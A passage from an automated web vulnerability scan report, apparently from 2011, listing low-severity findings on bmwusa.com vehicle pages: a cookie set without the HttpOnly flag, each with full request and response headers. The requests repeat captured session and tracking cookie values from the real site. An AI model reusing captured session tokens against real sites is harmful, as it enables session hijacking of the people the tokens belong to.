Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:04 GMT;path=/
Content-Length: 212740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.327. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:41 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:19:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:39:41 GMT;path=/
Content-Length: 212741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.328. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:53 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:53 GMT;path=/
Content-Length: 228844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.329. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:37 GMT;path=/
Content-Length: 228845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.330. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:25 GMT;path=/
Content-Length: 216305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.331. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:11 GMT;path=/
Content-Length: 216306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.332. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:08 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:08 GMT;path=/
Content-Length: 201935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.333. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:27 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:27 GMT;path=/
Content-Length: 257095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.334. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:25 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:25 GMT;path=/
Content-Length: 231691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.335. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:15 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:15 GMT;path=/
Content-Length: 231692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.336. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:30 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:30 GMT;path=/
Content-Length: 215290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.337. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:06 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:06 GMT;path=/
Content-Length: 215291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.338. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:49:41 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:49:41 GMT;path=/
Content-Length: 202033

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.339. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/7/activehybrid750i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:37 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
